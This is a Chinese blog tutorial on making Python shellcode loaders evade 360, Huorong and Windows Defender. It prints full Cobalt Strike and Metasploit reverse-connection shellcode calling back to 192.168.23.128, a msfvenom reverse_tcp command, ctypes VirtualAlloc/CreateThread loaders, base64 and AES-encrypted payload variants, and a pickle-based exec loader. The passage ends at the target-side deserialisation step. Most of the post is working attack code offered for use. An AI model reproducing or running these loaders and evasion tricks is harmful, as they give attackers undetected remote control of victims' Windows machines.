Shellcode免杀对抗(Python)

于 2024-02-17 11:28:23 发布
阅读量2w 收藏 19
点赞数 22
文章标签: python 网络安全 信息可视化 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74806534/article/details/136136603
版权

Shellcode Python免杀,绕过360安全卫士、火绒安全、Defender

Python基于cs/msf的上线

cs

执行代码2种可供选择

执行代码 1:
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 
0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, 
ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 
0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
​
执行代码 2:
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctype
s.c_int(-1))

先cs生成payload,此时生成c的和Python应该是效果一样的(x64尽量不开,因为我没有尝试成功)

image-20240211182953030

得到payload放到上面的代码里

import ctypes
#
#cs
shellcode=b'\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x58\x68\x52\x4b\x00\xca\x09\x59\x57\x77\xdd\x10\x6c\x09\xe4\x28\x9b\x23\x3d\x22\xe1\x61\xb0\x57\xe2\x93\x76\x13\x28\x6d\x71\x87\xf6\xf6\xfe\x1b\xfe\x95\x3d\x25\x39\x7f\x0d\xe9\x2a\x89\x23\x5c\x83\x5a\x35\x3f\xa9\x13\x5f\x55\x36\x62\x05\x2f\x70\x7d\xcf\x35\x8b\xcd\xdb\x00\x76\x97\x6f\x78\xe8\x37\x6a\x60\x4f\x27\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x30\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x0d\x0a\x00\x73\xd7\xa1\x38\x25\xce\xf8\xaf\x28\xc1\x20\xf4\x7a\x64\xaa\x3e\x20\x62\x0b\x71\xd1\xdf\xe1\x43\x4a\xcb\x51\x17\x65\xd0\x43\x44\x87\x7e\x73\x1f\x88\x72\x61\xb8\x83\xf8\xec\x34\x0b\xb4\x9b\xe9\xcb\x93\x99\x27\x8e\x4b\x50\xb7\x11\x08\x1f\x6a\x88\xcf\x17\x17\x2c\x46\x4c\xe2\xad\xb4\xe7\x16\x3e\x5f\x9f\x09\xa7\x84\x91\xdb\xb8\xa4\x33\x02\x49\xb0\xf7\x43\x96\x80\x2d\xb0\xd3\xfb\xd9\x0e\xcf\x86\xa0\x4f\x1d\x9f\xbd\x4b\xe7\xb6\x82\xf0\x5a\xb1\x7d\xfc\xe9\x2d\xfb\x2a\x05\x84\x07\x2c\x3a\xf7\xb0\xf7\xf7\x4f\xf8\xe1\x92\xd7\xc3\xa0\x5a\xc4\xa2\x4e\x9b\x51\x20\x20\xdb\x85\xf8\x07\x6c\xfd\x75\xc2\x1e\xca\x66\xa6\x34\x94\xee\xae\xc5\x23\x87\x15\xb5\xae\x2a\xcb\x36\xa8\xb6\x7d\xb4\x72\xa6\xc1\xb5\xcc\x82\xd7\x88\x23\x58\x83\xa0\xe8\x7b\x2f\xd0\xd8\xbc\x95\x97\xd6\x03\x7f\x8e\x11\x68\x33\xbc\xd7\x3a\xa4\x22\xaa\x9d\x55\x86\xe4\x51\x13\x89\x35\x3e\xca\x44\xc4\x03\x84\x5e\xbc\xf1\x62\xf9\x8d\x42\x4f\x3e\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x33\x2e\x31\x32\x38\x00\x00\x01\x86\xa0'
​
​
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

运行

image-20240211210308520

可以看到上线成功

image-20240211184232592

msf

开启msf,生成paylosd,依旧x86,C语言

image-20240211205930775

注意在生成的payload是被分行的,放到的代码里的时候,要像CS一样并成一行,很麻烦

import ctypes
​
​
#msf
shellcode =  b""
shellcode += b"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52"
shellcode += b"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x31\xff\x0f\xb7"
shellcode += b"\x4a\x26\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"
shellcode += b"\x01\xc7\x49\x75\xef\x52\x8b\x52\x10\x8b\x42\x3c\x57\x01"
shellcode += b"\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01\xd0\x8b\x58\x20\x50"
shellcode += b"\x01\xd3\x8b\x48\x18\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34"
shellcode += b"\x8b\x01\xd6\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75"
shellcode += b"\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58\x8b\x58\x24\x01"
shellcode += b"\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01"
shellcode += b"\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58"
shellcode += b"\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00"
shellcode += b"\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8"
shellcode += b"\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"
shellcode += b"\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x17\x80\x68\x02\x00"
shellcode += b"\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
shellcode += b"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74"
shellcode += b"\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
shellcode += b"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f"
shellcode += b"\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10"
shellcode += b"\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53"
shellcode += b"\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8"
shellcode += b"\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b"
shellcode += b"\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e"
shellcode += b"\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff"
shellcode += b"\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a"
shellcode += b"\x00\x53\xff\xd5"
​
print(shellcode)
# shellcode=b'\xfc\xe8\x8f\x00\x00\x00`\x89\xe51\xd2d\x8bR0\x8bR\x0c\x8bR\x14\x0f\xb7J&1\xff\x8br(1\xc0\xac<a|\x02, \xc1\xcf\r\x01\xc7Iu\xefR\x8bR\x10\x8bB<W\x01\xd0\x8b@x\x85\xc0tL\x01\xd0P\x8bX \x8bH\x18\x01\xd3\x85\xc9t<1\xffI\x8b4\x8b\x01\xd61\xc0\xac\xc1\xcf\r\x01\xc78\xe0u\xf4\x03}\xf8;}$u\xe0X\x8bX$\x01\xd3f\x8b\x0cK\x8bX\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89D$$[[aYZQ\xff\xe0X_Z\x8b\x12\xe9\x80\xff\xff\xff]h32\x00\x00hws2_ThLw&\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00)\xc4TPh)\x80k\x00\xff\xd5j\nh/^\xecuh\x02\x00\x1a \x89\xe6PPPP@P@Ph\xea\x0f\xdf\xe0\xff\xd5\x97j\x10VWh\x99\xa5ta\xff\xd5\x85\xc0t\n\xffN\x08u\xec\xe8g\x00\x00\x00j\x00j\x04VWh\x02\xd9\xc8_\xff\xd5\x83\xf8\x00~6\x8b6j@h\x00\x10\x00\x00Vj\x00hX\xa4S\xe5\xff\xd5\x93Sj\x00VSWh\x02\xd9\xc8_\xff\xd5\x83\xf8\x00}(Xh\x00@\x00\x00j\x00Ph\x0b/\x0f0\xff\xd5WhunMa\xff\xd5^^\xff\x0c$\x0f\x85p\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3)\xc6u\xc1\xc3\xbb\xf0\xb5\xa2Vj\x00S\xff\xd5'
​
​
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

msf开启监听(上面有详细步骤),然后运行脚本,成功上线

image-20240211212059721

免杀开始

原理

可以看出Python的shellcode主要是payload和加载器,所以主要从咱俩方面入手

1.对payload进行编码

2.更换加载器

payload进行base64编码

下面是编码代码

import base64
​
#cs
shellcode=b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x59\x61\x4f\x53\x00\xce\x7a\x92\xe0\x91\x59\x95\x01\xda\xc8\xe9\xfd\x90\xa0\x15\xbf\xb0\x69\xee\xcc\xd9\x04\x97\x51\xcd\x08\xf7\x2f\x79\xf1\x65\xb1\xf3\x75\xac\x94\x51\x72\x92\xe2\x7b\x95\x81\x15\xb4\x2a\xac\x36\xa4\x78\x00\xaa\x6a\x0e\x12\x01\xba\x28\x75\x65\xfc\x85\xd1\xef\x01\x42\x9a\x28\x2d\x4e\xdb\x90\x11\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x35\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x3b\x20\x44\x69\x67\x45\x78\x74\x3b\x20\x44\x54\x53\x20\x41\x67\x65\x6e\x74\x0d\x0a\x00\x37\x95\x35\x48\xc7\x9a\xfc\x03\x3f\xd6\x1c\x4b\x7c\xb6\xea\x21\x49\xd9\xdb\x1a\xec\x3f\x50\xb1\x66\x9d\x5b\x97\xd0\x57\xfd\xdf\xb8\xbf\xa5\x05\xe4\x22\x3a\x91\x90\x95\xaf\x57\xaa\xa2\x4e\x06\x35\xd8\x5c\x0b\x11\x24\x21\x59\x04\xa0\xbf\xda\x7c\x6a\x06\xab\xf0\x72\x99\x4d\xd2\xf4\xc6\xbe\x00\xd4\xa8\x16\xe1\x93\x19\x5b\x12\xc3\xc9\x18\x5d\x82\xb0\x1d\x9a\xc1\x2d\x71\x6e\x7a\x15\x5b\x12\x5a\xa9\xfd\x01\x23\x40\xc9\x21\x8c\x2b\xfa\x9c\xf1\x25\x5c\x04\x91\xe3\x9c\x78\x4a\x84\x51\x04\x11\x8e\x65\xdb\xea\x49\x7e\x48\xae\x0a\xb3\x40\xb4\x37\x73\x5f\xdf\x8d\xca\xe6\x0c\x4e\x5f\xe5\xc2\x58\x52\x43\x1b\x23\xcf\x72\x12\xb1\x41\x2f\x8f\x51\xe4\xca\x91\x43\x8e\x22\xa4\x3e\x4f\xd4\x04\x37\x15\xc6\xeb\x2a\x37\x00\x72\x72\xc8\x97\x4b\x5b\x02\x7c\xb4\xef\x63\xc6\x63\xac\x55\x41\xa3\xed\xac\x96\x46\x07\x44\x9f\x1c\x1a\x2e\xec\xc0\x69\x88\x42\xbc\x6a\x36\xce\x6a\x3e\x9b\x4a\xee\xfb\x70\xa2\x8a\x29\xd0\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x33\x2e\x31\x32\x38\x00\x00\x01\x86\xa0"
s = base64.b64encode(shellcode)
print(s)

或者直接msf加密也可

msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 
lhost=162.178.23.128 lport=4444 -f c

然后将结果替换之前shellcode的位置,记得加上解码

import ctypes
import base64 
#cs
shellcode=b'/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//VMf9XV1dXV2g6Vnmn/9XphAAAAFsxyVFRagNRUWhQAAAAU1BoV4mfxv/V63BbMdJSaAACQIRSUlJTUlBo61UuO//VicaDw1Ax/1dXav9TVmgtBhh7/9WFwA+EwwEAADH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9XagdRVlBot1fgC//VvwAvAAA5x3S3Mf/pkQEAAOnJAQAA6Iv///8vWWFPUwDOepLgkVmVAdrI6f2QoBW/sGnuzNkEl1HNCPcvefFlsfN1rJRRcpLie5WBFbQqrDakeACqag4SAboodWX8hdHvAUKaKC1O25ARAFVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDUuMDsgV2luZG93cyBOVDsgRGlnRXh0OyBEVFMgQWdlbnQNCgA3lTVIx5r8Az/WHEt8tuohSdnbGuw/ULFmnVuX0Ff937i/pQXkIjqRkJWvV6qiTgY12FwLESQhWQSgv9p8agar8HKZTdL0xr4A1KgW4ZMZWxLDyRhdgrAdmsEtcW56FVsSWqn9ASNAySGMK/qc8SVcBJHjnHhKhFEEEY5l2+pJfkiuCrNAtDdzX9+NyuYMTl/lwlhSQxsjz3ISsUEvj1HkypFDjiKkPk/UBDcVxusqNwBycsiXS1sCfLTvY8ZjrFVBo+2slkYHRJ8cGi7swGmIQrxqNs5qPptK7vtwooop0ABo8LWiVv/VakBoABAAAGgAAEAAV2hYpFPl/9WTuQAAAAAB2VFTiedXaAAgAABTVmgSloni/9WFwHTGiwcBw4XAdeVYw+ip/f//MTkyLjE2OC4yMy4xMjgAAAGGoA=='
​
shellcode=base64.b64decode(shellcode)  
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

运行看是否可以上线,可以看到再次上线成功

**image-20240211214503276**

aes加密

使用脚本,先对payload进行base64加密,再进行aes加密

from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
import base64
​
# 如果text不足16位的倍数就用空格补足为16位
def add_to_16(text):
    if len(text.encode('utf-8')) % 16:
        add = 16 - (len(text.encode('utf-8')) % 16)
    else:
        add = 0
    text = text + ('\0' * add)
    return text.encode('utf-8')
​
# 加密函数
def encrypt(text):
    key = '9999999999999999'.encode('utf-8')
    iv = b'qqqqqqqqqqqqqqqq'
    mode = AES.MODE_CBC
    cryptos = AES.new(key, mode, iv)
    plain_text = add_to_16(text)
    cipher_text = cryptos.encrypt(plain_text)
    return b2a_hex(cipher_text).decode()
​
if __name__ == '__main__':
    plaintext = "Your_plaintext_here"  # 你想要加密的内容
    encrypted_text = encrypt(plaintext)
    print("Encrypted text:", encrypted_text)

加密结果替换后,最后运行解密脚本

from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
import ctypes,base64
​
​
# 如果text不足16位的倍数就用空格补足为16位
def add_to_16(text):
    if len(text.encode('utf-8')) % 16:
        add = 16 - (len(text.encode('utf-8')) % 16)
    else:
        add = 0
    text = text + ('\0' * add)
    return text.encode('utf-8')
​
​
​
# 解密后,去掉补足的空格用strip() 去掉
def decrypt(text):
    key = '9999999999999999'.encode('utf-8')
    iv = b'qqqqqqqqqqqqqqqq'
    mode = AES.MODE_CBC
    cryptos = AES.new(key, mode, iv)
    plain_text = cryptos.decrypt(a2b_hex(text))
    shellcode=bytes.decode(plain_text).rstrip('\0')
    return shellcode
​
def zhixing(shellcode):
    rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
    ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
    handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
​
if __name__ == '__main__':
   #cs
    e='0e0d6b374430510532fb94ec3f9e3e933e26c58c784e26a7a50308a6cb9286b75810a376913a4d162ce26bf16c27d8924223ea45360e595f28130c67ef3e51c6f1b21d375aaa1b97e74bab97c9b87f80842cf3597d9b5cfbe361c30c54cce15aa6fafc88fd015f303c60a96900736b35f9d8aa9f0b8f1f89133d959a633e471a6b8aa5004d271541075a6bff3dcea93036aa3ebb4621eec32350be5b73e2aa90370b97c1544258f017466e8235f03b17b282ecbd6845340ca1f87e6f58a844974aa52f1544f92df67cc29046a14c0f6528c1b20e8f82e81ff182dba4d6320082ca98bb13d28ddc7304198039b87560a12054769073faa0bb0f07ac4b12cb19c48c7d3c002d19e5e6d439f1c822e7a6fbcef094f6840aec0672d8b2b669a0fed0bbe954260658ce63e4c75e307d47528fae505ee795a14a2f0e51812119e5480a6ee0b267be2df03994c8564aac446538a6fa2d65912ee020d783603ba3fb7bb5653994418cbe6d9a30c2730c043876d5713423d60d622fbfa418f25d28f3c6599df2d4458be05e1bfbd60abc3ef71cd64812681308f73920ef7fab1318758e8a940ba7eafa3599971b841069b67ef10b88ba58b9ad13ac676700394ec521eb040acd080f491903baa8352f8db8114ea920690978aea20c30855b786124f3d27b90155ee3533ee3620a5f48d26e38b60d786d2e7ff41a07fcc9c1e0abbacfce32b5765901b576fe110bed31374b8de6c4db5316c57dda772fe5b1736b5314e2a3b8b1d665e272024dfd433b0dbd0fef3981f5087866bba50a686575e2b0f26903a54172826e0bb3713cf85b29e227c69fb6f31ca2d462decc5e3213fbb472bbd91a47316ce02b7a99122543b7db75de61e5a34944f10c08dd5ecac8f3b7e28bbe24f2cb3ef6258ef404ab222b9f128acdeec3e8dd123273fb0db73f66fe6e06e6276e3294bac412689da195e240c37b0d7803ceab2deee1a4902ef3b85a1d81a5128591a31d7b12f1773c54fbd56ebdee86f19d0cd100dd83964c8525e2f3af81c4d19603483af04b8d2d21b026ae2af9edc293c66ee40d6be7ffa35b5b0e8e5ece4f9b15097ab1471b3fa5cc8d6ee1431a8a32562641e36fc5b44c422e25482ca319882691150f8713cd8d90ed3eacec170039923a8c4b70d64773260a30d23526356c31a40675b54d6546b1c84ae338f6173eeacb03a892331dc5e9cbf0b78a2bb5ceb434d7d72441565620a9c4ab156030f35ede7dad650483cbdf8e91d64250c6dbefe3ffeaa3ea77f82f270b48a232d35fb66db49aae980180625387a8bf317beed2f612c546f015864578629c020c8f2fca445bd03c74bf7bb882d051a9b8c55ce2cc73948ad171d3a802f8bbe1b542fc36b26171d2d02e2c4cd56e2bad9983145c7011d00e5cc77967b5b980ccb9b4fd6f28efcc8538cc62d5f9ddf9e67609ce9de733109f4c8ccfbfd705d068f2e09618838270591553d662713754382047a2f8dd65e6850db61bc4ad61606e'
    d = decrypt(e)  # 解密
    d=base64.b64decode(d)
    zhixing(d)

依旧可以上线

反序列化

思路:

本地对代码进行序列化

生成对象A的序列化数据并base64编码

调用魔术手法生成进行exec shellcode

shellcode是上面base64编码上线的整个代码(意思是执行那堆代码)

import pickle
import base64
​
shellcode = '''
import ctypes
import base64
​
encode_shellcode = b'/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//VMf9XV1dXV2g6Vnmn/9XphAAAAFsxyVFRagNRUWhQAAAAU1BoV4mfxv/V63BbMdJSaAACQIRSUlJTUlBo61UuO//VicaDw1Ax/1dXav9TVmgtBhh7/9WFwA+EwwEAADH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9XagdRVlBot1fgC//VvwAvAAA5x3S3Mf/pkQEAAOnJAQAA6Iv///8vRk14UQBuiBaVc/3Tji6rkQp7PpYkSpkLwkdf4eOFb1MSnNliqZdWFbJlK72bpKesiSBWHRtQERLSdHaYJwsW7q3KR2NhXjtRRVlRKUbvAFVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjA7IFRyaWRlbnQvNC4wKQ0KAG128dAxRkkmeTLV3SqJ5sJU662zTZS0F8jSp+LEi5SPc2GBXqsiCWvOV0JwyNCp3i0vCTOkcMtwrTmdcNrENa8zeHczC9QZsdwoEkRS5X+gI8fbLkaUjH6YJ9Sr4IozTjdn0MCTMQpCnE25WXVcw4SJv4uWGPHgWJftM/6J9JJmQFVb7XpSXe/nb7sYJxP5QV73Sgr1nQRvScFfb6R/DXnhbaVS5C/In7yWSvMm327+lffyiWRQy1qi+VwWm83LcxG5TqZfbB8yhqfig4y3ILh+Hutw21ZVp9AWNbSpkQxS7QBo8LWiVv/VakBoABAAAGgAAEAAV2hYpFPl/9WTuQAAAAAB2VFTiedXaAAgAABTVmgSloni/9WFwHTGiwcBw4XAdeVYw+ip/f//MTkyLjE2OC4yMy4xMjgAAAGGoA=='
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
'''
​
class A(object):
    def __reduce__(self):
        return (exec,(shellcode,))
​
ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
print(ret_base64)

靶机上对代码进行反序列化

import base64,pickle,ctypes
